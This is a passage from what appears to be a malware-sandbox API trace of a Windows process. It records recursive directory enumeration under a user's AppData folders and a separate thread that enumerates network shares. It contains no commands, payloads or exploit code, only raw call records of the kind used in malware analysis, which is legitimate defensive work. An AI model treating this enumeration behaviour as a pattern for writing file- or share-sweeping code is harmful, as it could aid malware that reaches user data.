HALPmcxz\\AppData\\") returned="AppData\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.588] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.588] PathFindFileNameW (pszPath="") returned="" [0218.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.588] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.589] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.589] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.589] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.589] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.589] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.589] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.590] PathFindFileNameW (pszPath="") returned="" [0218.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.590] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.590] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.590] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.590] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.591] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.591] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.591] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.591] PathFindFileNameW (pszPath="") returned="" [0218.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.592] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.592] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.592] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.592] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.592] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.592] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.593] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.593] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.593] PathFindFileNameW (pszPath="") returned="" [0218.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.593] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.593] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.593] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.593] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.593] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.595] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.595] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.595] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.595] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.595] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.595] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.595] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.596] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.596] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.596] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.596] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.596] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.596] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.597] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.597] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.597] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.597] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.597] SendMessageW (hWnd=0x2011c, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 156 os_tid = 0x164 [0205.523] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x3a7fee0 | out: lphEnum=0x3a7fee0*=0x3277ce8) returned 0x0 [0207.942] WNetEnumResourceW (in: hEnum=0x3277ce8, lpcCount=0x3a7fedc, lpBuffer=0x32e3358, lpBufferSize=0x3a7fed8 | out: lpcCount=0x3a7fedc, lpBuffer=0x32e3358, lpBufferSize=0x3a7fed8) returned 0x0 [0207.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32531e0 [0207.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253228 [0207.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x70) returned 0x32405b0 [0207.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253270 [0207.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32532b8 [0207.943] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x32e3358, lphEnum=0x3a7fe28 | out: lphEnum=0x3a7fe28*=0x773100) returned 0x0 [0207.948] WNetEnumResourceW (in: hEnum=0x773100, lpcCount=0x3a7fe24, lpBuffer=0x32e9360, lpBufferSize=0x3a7fe20 | out: lpcCount=0x3a7fe24, lpBuffer=0x32e9360, lpBufferSize=0x3a7fe20) returned 0x103 [0207.948] WNetCloseEnum (hEnum=0x773100) returned 0x0 [0207.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253228 | out: hHeap=0x750000) returned 1 [0207.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32531e0 | out: hHeap=0x750000) returned 1 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32531e0 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253228 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xe0) returned 0x326f728 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252a90 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253348 [0207.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32532b8 | out: hHeap=0x750000) returned 1 [0207.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253270 | out: hHeap=0x750000) returned 1 [0207.948] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32405b0 | out: hHeap=0x750000) returned 1 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253270 [0207.948] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32532b8 [0207.948] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x32e3378, lphEnum=0x3a7fe28 | out: lphEnum=0x3a7fe28*=0x3a7fe44) returned 0x4b8 [0222.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253228 | out: hHeap=0x750000) returned 1 [0222.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32531e0 | out: hHeap=0x750000) 